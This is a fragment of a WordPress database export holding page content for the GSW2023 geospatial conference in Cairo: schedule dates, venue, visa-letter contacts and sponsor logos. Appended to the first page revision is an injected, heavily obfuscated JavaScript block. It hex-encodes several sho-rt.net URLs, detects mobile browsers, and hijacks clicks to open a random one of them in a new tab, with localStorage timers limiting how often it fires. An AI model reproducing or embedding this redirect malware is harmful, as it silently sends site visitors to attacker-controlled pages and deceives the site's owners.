/>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:16:39','2023-08-16 00:16:39','',3066,'https://gsw2023.com/?p=5240',0,'revision','',0),
(5241,1,'2023-08-16 00:16:51','2023-08-16 00:16:51','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144904058{margin-top: -50px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text 